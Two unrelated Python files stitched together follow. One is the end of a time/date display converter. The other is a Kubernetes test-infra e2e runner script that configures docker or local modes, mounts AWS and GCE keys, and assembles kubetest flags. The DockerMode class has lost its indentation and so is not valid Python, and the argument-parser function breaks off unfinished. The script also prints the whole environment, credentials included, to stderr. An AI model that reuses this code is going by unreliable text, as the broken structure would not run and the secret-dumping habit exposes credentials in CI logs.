        # NOTE(review): the `/ 60` divisions rely on Python 2 integer division
        # for int inputs; a float `time` would yield fractional minutes.
        if self.type == self.IN_MINUTES:
            return ngettext("%d Min", "%d Mins", (time / 60)) % (time / 60)
        elif self.type == self.AS_LENGTH:
            if time < 0:
                return ""
            return "%d:%02d" % (time / 60, time % 60)
        elif self.type == self.TIMESTAMP:
            return str(time)

        # Everything below treats ``time`` as an epoch in local time.
        t = localtime(time)
        if self.type == self.WITH_SECONDS:
            # TRANSLATORS: full time representation hour:minute:seconds
            return _("%2d:%02d:%02d") % (t.tm_hour, t.tm_min, t.tm_sec)
        elif self.type == self.DEFAULT:
            # TRANSLATORS: short time representation hour:minute
            return _("%2d:%02d") % (t.tm_hour, t.tm_min)
        elif self.type == self.DATE:
            # TRANSLATORS: full date representation dayname daynum monthname year in strftime() format! See 'man strftime'
            d = _("%A %e %B %Y")
        elif self.type == self.FULL:
            # TRANSLATORS: long date representation short dayname daynum short monthname hour:minute in strftime() format! See 'man strftime'
            d = _("%a %e/%m %-H:%M")
        elif self.type == self.SHORT_DATE:
            # TRANSLATORS: short date representation short dayname daynum short monthname in strftime() format! See 'man strftime'
            d = _("%a %e/%m")
        elif self.type == self.LONG_DATE:
            # TRANSLATORS: long date representations dayname daynum monthname in strftime() format! See 'man strftime'
            d = _("%A %e %B")
        elif self.type == self.FULL_DATE:
            # TRANSLATORS: full date representations sort dayname daynum monthname long year in strftime() format! See 'man strftime'
            d = _("%a %e %B %Y")
        elif self.type == self.VFD:
            # TRANSLATORS: VFD hour:minute daynum short monthname in strftime() format! See 'man strftime'
            d = _("%k:%M %e/%m")
        elif self.type == self.FORMAT:
            d = self.fmt_string
        else:
            return "???"

        return strftime(d, t)

    text = property(getText)
|
#!/usr/bin/env python
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Need to figure out why this only fails on travis
# pylint: disable=bad-continuation
"""Runs kubernetes e2e test with specified config"""
import argparse
import hashlib
import os
import random
import re
import shutil
import signal
import subprocess
import sys
import tempfile
import traceback
import urllib2
import time
# Captured before any chdir so test_infra() can resolve repo-relative paths.
ORIG_CWD = os.getcwd()  # Checkout changes cwd

# Note: This variable is managed by experiment/bump_e2e_image.sh.
DEFAULT_KUBEKINS_TAG = 'v20180205-d99d9c246-master'

# The zones below are the zones available in the CNCF account (in theory, zones vary by account)
# We comment out zones below because we want to stay proportional to the limits
# We do one zone for every 10 t2.medium instances allowed
DEFAULT_AWS_ZONES = [
    #'ap-northeast-1a', # insufficient quota
    #'ap-northeast-1c', # insufficient quota
    #'ap-northeast-2a', # insufficient quota
    #'ap-northeast-2b', # insufficient quota
    #'ap-south-1a', # no c4.large instances available
    #'ap-south-1b', # no c4.large instances available
    #'ap-southeast-1a', # insufficient quota
    #'ap-southeast-1b', # insufficient quota
    #'ap-southeast-1c', # insufficient quota
    #'ap-southeast-2a', # insufficient quota
    #'ap-southeast-2b', # insufficient quota
    #'ap-southeast-2c', # insufficient quota
    #'ca-central-1a', # insufficient quota
    #'ca-central-1b', # insufficient quota
    #'eu-central-1a', # insufficient quota
    #'eu-central-1b', # insufficient quota
    #'eu-central-1c', # insufficient quota
    #'eu-west-1a', # insufficient quota
    #'eu-west-1b', # insufficient quota
    #'eu-west-1c', # insufficient quota
    #'eu-west-2a', # insufficient quota
    #'eu-west-2b', # insufficient quota
    #'eu-west-2c', # insufficient quota
    #'eu-west-3a', # insufficient quota
    #'eu-west-3b', # insufficient quota
    #'eu-west-3c', # insufficient quota
    #'sa-east-1a', # insufficient quota
    #'sa-east-1c' # insufficient quota
    'us-east-1a',
    'us-east-1b',
    #'us-east-1c', # limiting to 2 zones to not overallocate
    #'us-east-1d', # limiting to 2 zones to not overallocate
    #'us-east-1e', # limiting to 2 zones to not overallocate
    #'us-east-1f', # limiting to 2 zones to not overallocate
    #'us-east-2a', # no c4.large instances available
    #'us-east-2b', # no c4.large instances available
    #'us-east-2c', # no c4.large instances available
    'us-west-1a',
    #'us-west-1b', # overall limit is 10 instances
    'us-west-2a',
    'us-west-2b',
    #'us-west-2c' # limiting to 2 zones to not overallocate
]
def test_infra(*paths):
    """Return path relative to root of test-infra repo."""
    # Anchor on the script's own directory so a checkout-time chdir is harmless.
    script_dir = os.path.dirname(__file__)
    return os.path.join(ORIG_CWD, script_dir, '..', *paths)
def check(*cmd):
    """Log the command to stderr, then run it, raising on errors."""
    sys.stderr.write('Run: %s\n' % (cmd,))
    subprocess.check_call(cmd)
def check_output(*cmd):
    """Log the command to stderr, run it, raise on errors, return its output."""
    sys.stderr.write('Run: %s\n' % (cmd,))
    return subprocess.check_output(cmd)
def check_env(env, *cmd):
    """Log and run the command with a specific env, raising on errors."""
    # Dump the full environment (sorted for stable logs) before running.
    sys.stderr.write('Environment:\n')
    for key, value in sorted(env.items()):
        sys.stderr.write('%s=%s\n' % (key, value))
    sys.stderr.write('Run: %s\n' % (cmd,))
    subprocess.check_call(cmd, env=env)
def kubekins(tag):
    """Return the fully-qualified kubekins-e2e image reference for *tag*."""
    return 'gcr.io/k8s-testimages/kubekins-e2e:{}'.format(tag)
def parse_env(env):
    """Split 'FOO=BAR=MORE' into ['FOO', 'BAR=MORE'] (only the first '=' splits)."""
    name, sep, value = env.partition('=')
    # A string with no '=' yields a one-element list, like split('=', 1) would.
    return [name, value] if sep else [name]
def aws_role_config(profile, arn):
    """Return an AWS config snippet declaring the jenkins assumed role."""
    template = ('[profile jenkins-assumed-role]\n'
                'role_arn = {}\n'
                'source_profile = {}\n')
    return template.format(arn, profile)
def kubeadm_version(mode, shared_build_gcs_path):
    """Return string to use for kubeadm version, given the job's mode (ci/pull/periodic)."""
    if mode in ('ci', 'periodic'):
        # These modes run against the kubernetes repo, and bootstrap.py leaves
        # the cwd at the repository root, so the workspace-status script is
        # available. Its SCM revision identifies the debs the bazel-build job
        # should already have published.
        match = re.search(
            r'STABLE_BUILD_SCM_REVISION ([^\n]+)',
            check_output('hack/print-workspace-status.sh')
        )
        if not match:
            raise ValueError('STABLE_BUILD_SCM_REVISION not found')
        version = match.group(1)
        # Work-around for release-1.6 jobs, which still upload debs to an
        # older location (without os/arch prefixes).
        # TODO(pipejakob): remove this when we no longer support 1.6.x.
        if version.startswith('v1.6.'):
            return 'gs://kubernetes-release-dev/bazel/%s/build/debs/' % version
        # The path given here should match jobs/ci-kubernetes-bazel-build.sh
        return 'gs://kubernetes-release-dev/bazel/%s/bin/linux/amd64/' % version
    if mode == 'pull':
        # shared_build_gcs_path looks like:
        #   gs://kubernetes-release-dev/bazel/<git-describe-output>
        # Append bin/linux/amd64 so it points at the dir with the debs.
        return '%s/bin/linux/amd64/' % shared_build_gcs_path
    if mode == 'stable':
        # kubeadm itself is not the SUT here; use the released packages.
        return 'stable'
    raise ValueError("Unknown kubeadm mode given: %s" % mode)
class LocalMode(object):
    """Runs e2e tests by calling kubetest."""

    def __init__(self, workspace, artifacts):
        self.command = 'kubetest'
        self.workspace = workspace
        self.artifacts = artifacts
        # Env overrides live in three buckets; start() merges them with
        # os_env first, then env_files, then env — last write wins.
        self.env = []
        self.os_env = []
        self.env_files = []
        self.add_environment(
            'HOME=%s' % workspace,
            'WORKSPACE=%s' % workspace,
            'PATH=%s' % os.getenv('PATH'),
        )

    def add_environment(self, *envs):
        """Adds FOO=BAR to the list of environment overrides."""
        self.env.extend(parse_env(e) for e in envs)

    def add_os_environment(self, *envs):
        """Adds FOO=BAR to the list of os environment overrides."""
        self.os_env.extend(parse_env(e) for e in envs)

    def add_file(self, env_file):
        """Reads all FOO=BAR lines from env_file."""
        with open(env_file) as fp:
            for line in fp:
                line = line.rstrip()
                # Skip blank lines and comments.
                if not line or line.startswith('#'):
                    continue
                self.env_files.append(parse_env(line))

    def add_env(self, env):
        """Adds a single FOO=BAR override at env-file precedence."""
        self.env_files.append(parse_env(env))

    def add_aws_cred(self, priv, pub, cred):
        """Sets aws keys and credentials."""
        ssh_dir = os.path.join(self.workspace, '.ssh')
        if not os.path.isdir(ssh_dir):
            os.makedirs(ssh_dir)
        cred_dir = os.path.join(self.workspace, '.aws')
        if not os.path.isdir(cred_dir):
            os.makedirs(cred_dir)
        aws_ssh = os.path.join(ssh_dir, 'kube_aws_rsa')
        aws_pub = os.path.join(ssh_dir, 'kube_aws_rsa.pub')
        aws_cred = os.path.join(cred_dir, 'credentials')
        shutil.copy(priv, aws_ssh)
        shutil.copy(pub, aws_pub)
        shutil.copy(cred, aws_cred)
        # NOTE(review): these env vars point at the *source* files, not the
        # workspace copies made above — confirm that is intentional.
        self.add_environment(
            'JENKINS_AWS_SSH_PRIVATE_KEY_FILE=%s' % priv,
            'JENKINS_AWS_SSH_PUBLIC_KEY_FILE=%s' % pub,
            'JENKINS_AWS_CREDENTIALS_FILE=%s' % cred,
        )

    def add_aws_role(self, profile, arn):
        """Writes an assumed-role AWS config and returns the profile name."""
        with open(os.path.join(self.workspace, '.aws', 'config'), 'w') as cfg:
            cfg.write(aws_role_config(profile, arn))
        self.add_environment('AWS_SDK_LOAD_CONFIG=true')
        return 'jenkins-assumed-role'

    def add_gce_ssh(self, priv, pub):
        """Copies priv, pub keys to $WORKSPACE/.ssh."""
        ssh_dir = os.path.join(self.workspace, '.ssh')
        if not os.path.isdir(ssh_dir):
            os.makedirs(ssh_dir)
        gce_ssh = os.path.join(ssh_dir, 'google_compute_engine')
        gce_pub = os.path.join(ssh_dir, 'google_compute_engine.pub')
        shutil.copy(priv, gce_ssh)
        shutil.copy(pub, gce_pub)
        self.add_environment(
            'JENKINS_GCE_SSH_PRIVATE_KEY_FILE=%s' % gce_ssh,
            'JENKINS_GCE_SSH_PUBLIC_KEY_FILE=%s' % gce_pub,
        )

    @staticmethod
    def add_service_account(path):
        """Returns path (kubetest reads the file directly in local mode)."""
        return path

    def add_k8s(self, *a, **kw):
        """Add specified k8s.io repos (noop)."""
        pass

    def use_latest_image(self, image_family, image_project):
        """Gets the latest image from the image_family in the image_project."""
        out = check_output(
            'gcloud', 'compute', 'images', 'describe-from-family',
            image_family, '--project=%s' % image_project)
        # Extract the value of the "name: ..." line from the gcloud output.
        latest_image = next(
            (line[6:].strip() for line in out.split('\n') if (
                line.startswith('name: '))),
            None)
        if not latest_image:
            raise ValueError(
                'Failed to get the latest image from family %s in project %s' % (
                    image_family, image_project))
        # TODO(yguo0905): Support this in GKE.
        self.add_environment(
            'KUBE_GCE_NODE_IMAGE=%s' % latest_image,
            'KUBE_GCE_NODE_PROJECT=%s' % image_project)
        print >>sys.stderr, 'Set KUBE_GCE_NODE_IMAGE=%s' % latest_image
        print >>sys.stderr, 'Set KUBE_GCE_NODE_PROJECT=%s' % image_project

    def add_aws_runner(self):
        """Start with kops-e2e-runner.sh"""
        # TODO(Krzyzacy):retire kops-e2e-runner.sh
        self.command = os.path.join(self.workspace, 'kops-e2e-runner.sh')

    def start(self, args):
        """Starts kubetest."""
        print >>sys.stderr, 'starts with local mode'
        env = {}
        # Precedence, lowest to highest: inherited os env, env files, -e envs.
        env.update(self.os_env)
        env.update(self.env_files)
        env.update(self.env)
        check_env(env, self.command, *args)
class DockerMode(object):
"""Runs e2e tests via docker run kubekins-e2e."""
def __init__(self, container, artifacts, sudo, tag, mount_paths):
self.tag = tag
try: # Pull a newer version if one exists
check('docker', 'pull', kubekins(tag))
except subprocess.CalledProcessError:
pass
print 'Starting %s...' % container
self.workspace = '/workspace'
self.container = container
self.local_artifacts = artifacts
self.artifacts = os.path.join(self.workspace, '_artifacts')
self.cmd = [
'docker', 'run', '--rm',
'--name=%s' % container,
'-v', '%s:%s' % (artifacts, self.artifacts),
'-v', '/etc/localtime:/etc/localtime:ro',
]
for path in mount_paths or []:
self.cmd.extend(['-v', path])
if sudo:
self.cmd.extend(['-v', '/var/run/docker.sock:/var/run/docker.sock'])
self.add_env('HOME=%s' % self.workspace)
self.add_env('WORKSPACE=%s' % self.workspace)
self.cmd.append(
'--entrypoint=/workspace/kubetest'
)
def add_environment(self, *envs):
"""Adds FOO=BAR to the -e list for docker.
Host-specific environment variables are ignored."""
# TODO(krzyzacy) change this to a whitelist?
docker_env_ignore = [
'GOOGLE_APPLICATION_CREDENTIALS',
'GOPATH',
'GOROOT',
'HOME',
'PATH',
'PWD',
'WORKSPACE'
]
for env in envs:
key, _value = parse_env(env)
if key in docker_env_ignore:
print >>sys.stderr, 'Skipping environment variable %s' % env
else:
self.add_env(env)
def add_os_environment(self, *envs):
"""Adds os envs as FOO=BAR to the -e list for docker."""
self.add_environment(*envs)
def add_file(self, env_file):
"""Adds the file to the --env-file list."""
self.cmd.extend(['--env-file', env_file])
def add_env(self, env):
"""Adds a single environment variable to the -e list for docker.
Does not check against any blacklists."""
self.cmd.extend(['-e', env])
def add_k8s(self, k8s, *repos):
"""Add the specified k8s.io repos into container."""
for repo in repos:
self.cmd.extend([
'-v', '%s/%s:/go/src/k8s.io/%s' % (k8s, repo, repo)])
def add_aws_cred(self, priv, pub, cred):
"""Mounts aws keys/creds inside the container."""
aws_ssh = os.path.join(self.workspace, '.ssh', 'kube_aws_rsa')
aws_pub = '%s.pub' % aws_ssh
aws_cred = os.path.join(self.workspace, '.aws', 'credentials')
self.cmd.extend([
'-v', '%s:%s:ro' % (priv, aws_ssh),
'-v', '%s:%s:ro' % (pub, aws_pub),
'-v', '%s:%s:ro' % (cred, aws_cred),
])
def add_aws_role(self, profile, arn):
with tempfile.NamedTemporaryFile(prefix='aws-config', delete=False) as cfg:
cfg.write(aws_role_config(profile, arn))
self.cmd.extend([
'-v', '%s:%s:ro' % (os.path.join(self.workspace, '.aws', 'config'), cfg.name),
'-e', 'AWS_SDK_LOAD_CONFIG=true',
])
return 'jenkins-assumed-role'
def add_aws_runner(self):
"""Run kops_aws_runner for kops-aws jobs."""
self.cmd.append(
'--entrypoint=%s/kops-e2e-runner.sh' % self.workspace
)
def add_gce_ssh(self, priv, pub):
"""Mounts priv and pub inside the container."""
gce_ssh = os.path.join(self.workspace, '.ssh', 'google_compute_engine')
gce_pub = '%s.pub' % gce_ssh
self.cmd.extend([
'-v', '%s:%s:ro' % (priv, gce_ssh),
'-v', '%s:%s:ro' % (pub, gce_pub),
'-e', 'JENKINS_GCE_SSH_PRIVATE_KEY_FILE=%s' % gce_ssh,
'-e', 'JENKINS_GCE_SSH_PUBLIC_KEY_FILE=%s' % gce_pub])
def add_service_account(self, path):
"""Mounts path at /service-account.json inside the container."""
service = '/service-account.json'
self.cmd.extend(['-v', '%s:%s:ro' % (path, service)])
return service
def start(self, args):
"""Runs kubetest inside a docker container."""
print >>sys.stderr, 'starts with docker mode'
cmd = list(self.cmd)
cmd.append(kubekins(self.tag))
cmd.extend(args)
signal.signal(signal.SIGTERM, self.sig_handler)
signal.signal(signal.SIGINT, self.sig_handler)
try:
check(*cmd)
finally: # Ensure docker files are readable by bootstrap
if not os.path.isdir(self.local_artifacts): # May not exist
pass
try:
check('sudo', 'chmod', '-R', 'o+r', self.local_artifacts)
except subprocess.CalledProcessError: # fails outside CI
traceback.print_exc()
def sig_handler(self, _signo, _frame):
"""Stops container upon receive signal.SIGTERM and signal.SIGINT."""
print >>sys.stderr, 'docker stop (signo=%s, frame=%s)' % (_signo, _frame)
check('docker', 'stop', self.container)
def cluster_name(cluster, build):
    """Return or select a cluster name."""
    if cluster:
        return cluster
    if len(build) >= 20:
        # Too long for a resource name; use a stable 10-char digest instead.
        return 'e2e-%s' % hashlib.md5(build).hexdigest()[:10]
    return 'e2e-%s' % build
# TODO(krzyzacy): Move this into kubetest
def build_kops(kops, mode):
    """Build kops, set kops related envs."""
    if os.path.basename(kops) != 'kops':
        raise ValueError(kops)
    build_version = 'pull-' + check_output('git', 'describe', '--always').strip()
    job = os.getenv('JOB_NAME', 'pull-kops-e2e-kubernetes-aws')
    gcs_location = 'gs://kops-ci/pulls/%s' % job
    http_base = 'https://storage.googleapis.com/kops-ci/pulls/%s' % job
    # Point kubetest at the location this build will be published to.
    mode.add_environment(
        'KOPS_BASE_URL=%s/%s' % (http_base, build_version),
        'GCS_LOCATION=%s' % gcs_location
    )
    check('make', 'gcs-publish-ci', 'VERSION=%s' % build_version, 'GCS_LOCATION=%s' % gcs_location)
def set_up_kops_gce(workspace, args, mode, cluster, runner_args):
    """Set up kops on GCE envs."""
    # Both ssh keys must exist before handing them to the mode.
    for key_path in (args.gce_ssh, args.gce_pub):
        expanded = os.path.expandvars(key_path)
        if not os.path.isfile(expanded):
            raise IOError(key_path, expanded)
    mode.add_gce_ssh(args.gce_ssh, args.gce_pub)
    ssh_key = os.path.join(workspace, '.ssh', 'google_compute_engine')
    zones = args.kops_zones or random.choice(
        ['us-central1-a', 'us-central1-b', 'us-central1-c', 'us-central1-f'])
    runner_args += [
        '--kops-cluster=%s' % cluster,
        '--kops-zones=%s' % zones,
        '--kops-state=%s' % args.kops_state_gce,
        '--kops-nodes=%s' % args.kops_nodes,
        '--kops-ssh-key=%s' % ssh_key,
    ]
def set_up_kops_aws(workspace, args, mode, cluster, runner_args):
    """Set up aws related envs for kops. Will replace set_up_aws."""
    # All three credential files must exist before handing them to the mode.
    for cred_path in (args.aws_ssh, args.aws_pub, args.aws_cred):
        expanded = os.path.expandvars(cred_path)
        if not os.path.isfile(expanded):
            raise IOError(cred_path, expanded)
    mode.add_aws_cred(args.aws_ssh, args.aws_pub, args.aws_cred)
    ssh_key = os.path.join(workspace, '.ssh', 'kube_aws_rsa')
    profile = args.aws_profile
    if args.aws_role_arn:
        profile = mode.add_aws_role(profile, args.aws_role_arn)
    zones = args.kops_zones or random.choice(DEFAULT_AWS_ZONES)
    # The enclosing region is the zone name minus its trailing letter.
    regions = ','.join(zone[:-1] for zone in zones.split(','))
    mode.add_environment(
        'AWS_PROFILE=%s' % profile,
        'AWS_DEFAULT_PROFILE=%s' % profile,
        'KOPS_REGIONS=%s' % regions,
    )
    if args.aws_cluster_domain:
        cluster = '%s.%s' % (cluster, args.aws_cluster_domain)
    runner_args += [
        '--kops-cluster=%s' % cluster,
        '--kops-zones=%s' % zones,
        '--kops-state=%s' % args.kops_state,
        '--kops-nodes=%s' % args.kops_nodes,
        '--kops-ssh-key=%s' % ssh_key,
        '--kops-ssh-user=admin',
    ]
def set_up_aws(workspace, args, mode, cluster, runner_args):
    """Set up aws related envs. Legacy; will be replaced by set_up_kops_aws."""
    # All three credential files must exist before handing them to the mode.
    for cred_path in (args.aws_ssh, args.aws_pub, args.aws_cred):
        expanded = os.path.expandvars(cred_path)
        if not os.path.isfile(expanded):
            raise IOError(cred_path, expanded)
    mode.add_aws_cred(args.aws_ssh, args.aws_pub, args.aws_cred)
    ssh_key = os.path.join(workspace, '.ssh', 'kube_aws_rsa')
    profile = args.aws_profile
    if args.aws_role_arn:
        profile = mode.add_aws_role(profile, args.aws_role_arn)
    zones = args.kops_zones or random.choice(DEFAULT_AWS_ZONES)
    # The enclosing region is the zone name minus its trailing letter.
    regions = ','.join(zone[:-1] for zone in zones.split(','))
    mode.add_environment(
        'AWS_PROFILE=%s' % profile,
        'AWS_DEFAULT_PROFILE=%s' % profile,
        'KOPS_REGIONS=%s' % regions,
    )
    if args.aws_cluster_domain:
        cluster = '%s.%s' % (cluster, args.aws_cluster_domain)
    runner_args += [
        '--kops-cluster=%s' % cluster,
        '--kops-zones=%s' % zones,
        '--kops-state=%s' % args.kops_state,
        '--kops-nodes=%s' % args.kops_nodes,
        '--kops-ssh-key=%s' % ssh_key,
        '--kops-ssh-user=admin',
    ]
    # TODO(krzyzacy): Remove after kops-e2e-runner.sh is retired.
    mode.add_aws_runner()
def read_gcs_path(gcs_path):
    """reads a gcs path (gs://...) by GETing storage.googleapis.com"""
    url = gcs_path.replace('gs://', 'https://storage.googleapis.com/')
    contents = urllib2.urlopen(url).read()
    sys.stderr.write("Read GCS Path: %s\n" % contents)
    return contents
def get_shared_gcs_path(gcs_shared, use_shared_build):
    """return the shared path for this set of jobs using args and $PULL_REFS."""
    # A non-empty strategy becomes a '<strategy>-' filename prefix.
    prefix = '%s-' % use_shared_build if use_shared_build else ''
    return os.path.join(
        gcs_shared, os.getenv('PULL_REFS', ''),
        prefix + 'build-location.txt')
def main(args):
    """Set up env, start kubekins-e2e, handle termination. """
    # pylint: disable=too-many-branches,too-many-statements,too-many-locals
    # Rules for env var priority here in docker:
    # -e FOO=a -e FOO=b -> FOO=b
    # --env-file FOO=a --env-file FOO=b -> FOO=b
    # -e FOO=a --env-file FOO=b -> FOO=a(!!!!)
    # --env-file FOO=a -e FOO=b -> FOO=b
    #
    # So if you overwrite FOO=c for a local run it will take precedence.
    #
    # Set up workspace/artifacts dir
    workspace = os.environ.get('WORKSPACE', os.getcwd())
    artifacts = os.path.join(workspace, '_artifacts')
    if not os.path.isdir(artifacts):
        os.makedirs(artifacts)
    container = '%s-%s' % (os.environ.get('JOB_NAME'), os.environ.get('BUILD_NUMBER'))
    # Select the execution mode: containerized (DockerMode) or on-host (LocalMode).
    if args.mode == 'docker':
        # Builds need docker-in-docker, which requires the host docker socket.
        sudo = args.docker_in_docker or args.build is not None or args.build_federation is not None
        mode = DockerMode(container, artifacts, sudo, args.tag, args.mount_paths)
    elif args.mode == 'local':
        mode = LocalMode(workspace, artifacts)  # pylint: disable=bad-option-value
    else:
        raise ValueError(args.mode)
    for env_file in args.env_file:
        mode.add_file(test_infra(env_file))
    for env in args.env:
        mode.add_env(env)
    # TODO(fejta): remove after next image push
    mode.add_environment('KUBETEST_MANUAL_DUMP=y')
    runner_args = [
        '-v',
        '--dump=%s' % mode.artifacts,
    ]
    if args.service_account:
        runner_args.append(
            '--gcp-service-account=%s' % mode.add_service_account(args.service_account))
    shared_build_gcs_path = ""
    if args.use_shared_build is not None:
        # find shared build location from GCS
        gcs_path = get_shared_gcs_path(args.gcs_shared, args.use_shared_build)
        print >>sys.stderr, 'Getting shared build location from: '+gcs_path
        # retry loop for reading the location
        attempts_remaining = 12
        while True:
            attempts_remaining -= 1
            try:
                # tell kubetest to extract from this location
                shared_build_gcs_path = read_gcs_path(gcs_path)
                args.kubetest_args.append('--extract=' + shared_build_gcs_path)
                # A shared build supersedes building locally.
                args.build = None
                break
            except urllib2.URLError as err:
                print >>sys.stderr, 'Failed to get shared build location: %s' % err
                if attempts_remaining > 0:
                    print >>sys.stderr, 'Waiting 5 seconds and retrying...'
                    time.sleep(5)
                else:
                    raise RuntimeError('Failed to get shared build location too many times!')
    elif args.build is not None:
        if args.build == '':
            # Empty string means --build was passed without any arguments;
            # if --build wasn't passed, args.build would be None
            runner_args.append('--build')
        else:
            runner_args.append('--build=%s' % args.build)
        # Building requires the cwd to be the kubernetes repo root.
        k8s = os.getcwd()
        if not os.path.basename(k8s) == 'kubernetes':
            raise ValueError(k8s)
        mode.add_k8s(os.path.dirname(k8s), 'kubernetes', 'release')
    if args.build_federation is not None:
        if args.build_federation == '':
            runner_args.append('--build-federation')
        else:
            runner_args.append('--build-federation=%s' % args.build_federation)
        # Building federation requires the cwd to be the federation repo root.
        fed = os.getcwd()
        if not os.path.basename(fed) == 'federation':
            raise ValueError(fed)
        mode.add_k8s(os.path.dirname(fed), 'federation', 'release')
    if args.kops_build:
        build_kops(os.getcwd(), mode)
    if args.stage is not None:
        runner_args.append('--stage=%s' % args.stage)
        if args.aws:
            # Look up the staged kubernetes version from the workspace status.
            for line in check_output('hack/print-workspace-status.sh').split('\n'):
                if 'gitVersion' in line:
                    _, version = line.strip().split(' ')
                    break
            else:
                raise ValueError('kubernetes version not found in workspace status')
            runner_args.append('--kops-kubernetes-version=%s/%s' % (
                args.stage.replace('gs://', 'https://storage.googleapis.com/'),
                version))
    # TODO(fejta): move these out of this file
    if args.up == 'true':
        runner_args.append('--up')
    if args.down == 'true':
        runner_args.append('--down')
    if args.test == 'true':
        runner_args.append('--test')
    # Passthrough some args to kubetest
    if args.deployment:
        runner_args.append('--deployment=%s' % args.deployment)
    if args.provider:
        runner_args.append('--provider=%s' % args.provider)
    cluster = cluster_name(args.cluster, os.getenv('BUILD_NUMBER', 0))
    runner_args.append('--cluster=%s' % cluster)
    runner_args.append('--gcp-network=%s' % cluster)
    runner_args.extend(args.kubetest_args)
    if args.use_logexporter:
        # TODO(fejta): Take the below value through a flag instead of env var.
        runner_args.append('--logexporter-gcs-path=%s' % os.environ.get('GCS_ARTIFACTS_DIR', ''))
    if args.kubeadm:
        version = kubeadm_version(args.kubeadm, shared_build_gcs_path)
        runner_args.extend([
            '--kubernetes-anywhere-path=%s' % os.path.join(workspace, 'kubernetes-anywhere'),
            '--kubernetes-anywhere-phase2-provider=kubeadm',
            '--kubernetes-anywhere-cluster=%s' % cluster,
            '--kubernetes-anywhere-kubeadm-version=%s' % version,
        ])
        if args.kubeadm == "pull":
            # If this is a pull job; the kubelet version should equal
            # the kubeadm version here: we should use debs from the PR build
            runner_args.extend([
                '--kubernetes-anywhere-kubelet-version=%s' % version,
            ])
    # Provider/deployment-specific credential and flag setup.
    if args.aws:
        # Legacy - prefer passing --deployment=kops, --provider=aws,
        # which does not use kops-e2e-runner.sh
        set_up_aws(mode.workspace, args, mode, cluster, runner_args)
    elif args.deployment == 'kops' and args.provider == 'aws':
        set_up_kops_aws(mode.workspace, args, mode, cluster, runner_args)
    elif args.deployment == 'kops' and args.provider == 'gce':
        set_up_kops_gce(mode.workspace, args, mode, cluster, runner_args)
    elif args.gce_ssh:
        mode.add_gce_ssh(args.gce_ssh, args.gce_pub)
    # TODO(fejta): delete this?
    mode.add_os_environment(*(
        '%s=%s' % (k, v) for (k, v) in os.environ.items()))
    mode.add_environment(
        # Boilerplate envs
        # Skip gcloud update checking
        'CLOUDSDK_COMPONENT_MANAGER_DISABLE_UPDATE_CHECK=true',
        # Use default component update behavior
        'CLOUDSDK_EXPERIMENTAL_FAST_COMPONENT_UPDATE=false',
        # AWS
        'KUBE_AWS_INSTANCE_PREFIX=%s' % cluster,
        # GCE
        'INSTANCE_PREFIX=%s' % cluster,
        'KUBE_GCE_INSTANCE_PREFIX=%s' % cluster,
    )
    if args and args.image_family and args.image_project:
        mode.use_latest_image(args.image_family, args.image_project)
    mode.start(runner_args)
def create_parser():
    """Build the argparse parser for the e2e runner's command line.

    Flags fall into four groups: run mode / environment plumbing, build &
    cluster selection, kops/aws legacy options, and kubetest passthrough
    flags that also change behaviour in this script.
    """
    parser = argparse.ArgumentParser()
    # Shorthand: every flag below is a plain parser.add_argument call.
    add = parser.add_argument
    add('--mode', default='local', choices=['local', 'docker'])
    add('--env-file', default=[], action="append",
        help='Job specific environment file')
    add('--env', default=[], action="append",
        help='Job specific environment setting (usage: "--env=VAR=SETTING" will set VAR to SETTING).')
    add('--image-family',
        help='The image family from which to fetch the latest image')
    add('--image-project',
        help='The image project from which to fetch the test images')
    add('--gce-ssh',
        default=os.environ.get('JENKINS_GCE_SSH_PRIVATE_KEY_FILE'),
        help='Path to .ssh/google_compute_engine keys')
    add('--gce-pub',
        default=os.environ.get('JENKINS_GCE_SSH_PUBLIC_KEY_FILE'),
        help='Path to pub gce ssh key')
    add('--service-account',
        default=os.environ.get('GOOGLE_APPLICATION_CREDENTIALS'),
        help='Path to service-account.json')
    add('--mount-paths', action='append',
        help='Paths that should be mounted within the docker container in the form local:remote')
    add('--build', nargs='?', default=None, const='',
        help='Build kubernetes binaries if set, optionally specifying strategy')
    add('--build-federation', nargs='?', default=None, const='',
        help='Build federation binaries if set, optionally specifying strategy')
    add('--use-shared-build', nargs='?', default=None, const='',
        help='Use prebuilt kubernetes binaries if set, optionally specifying strategy')
    add('--gcs-shared',
        default='gs://kubernetes-jenkins/shared-results/',
        help='Get shared build from this bucket')
    add('--cluster', default='bootstrap-e2e', help='Name of the cluster')
    add('--docker-in-docker', action='store_true',
        help='Enable run docker within docker')
    add('--kubeadm', choices=['ci', 'periodic', 'pull', 'stable'])
    add('--stage', default=None, help='Stage release to GCS path provided')
    add('--tag', default=DEFAULT_KUBEKINS_TAG,
        help='Use a specific kubekins-e2e tag if set')
    add('--test', default='true',
        help='If we need to run any actual test within kubetest')
    add('--down', default='true',
        help='If we need to tear down the e2e cluster')
    add('--up', default='true',
        help='If we need to bring up a e2e cluster')
    add('--use-logexporter', action='store_true',
        help='If we need to use logexporter tool to upload logs from nodes to GCS directly')
    add('--kubetest_args', action='append', default=[],
        help='Send unrecognized args directly to kubetest')
    # kops & aws
    # TODO(justinsb): replace with --provider=aws --deployment=kops
    add('--aws', action='store_true', help='E2E job runs in aws')
    add('--aws-profile',
        default=(
            os.environ.get('AWS_PROFILE') or
            os.environ.get('AWS_DEFAULT_PROFILE') or
            'default'
        ),
        help='Profile within --aws-cred to use')
    add('--aws-role-arn',
        default=os.environ.get('KOPS_E2E_ROLE_ARN'),
        help='Use --aws-profile to run as --aws-role-arn if set')
    add('--aws-ssh',
        default=os.environ.get('JENKINS_AWS_SSH_PRIVATE_KEY_FILE'),
        help='Path to private aws ssh keys')
    add('--aws-pub',
        default=os.environ.get('JENKINS_AWS_SSH_PUBLIC_KEY_FILE'),
        help='Path to pub aws ssh key')
    add('--aws-cred',
        default=os.environ.get('JENKINS_AWS_CREDENTIALS_FILE'),
        help='Path to aws credential file')
    add('--aws-cluster-domain',
        help='Domain of the aws cluster for aws-pr jobs')
    add('--kops-nodes', default=4, type=int,
        help='Number of nodes to start')
    add('--kops-state', default='s3://k8s-kops-prow/',
        help='Name of the aws state storage')
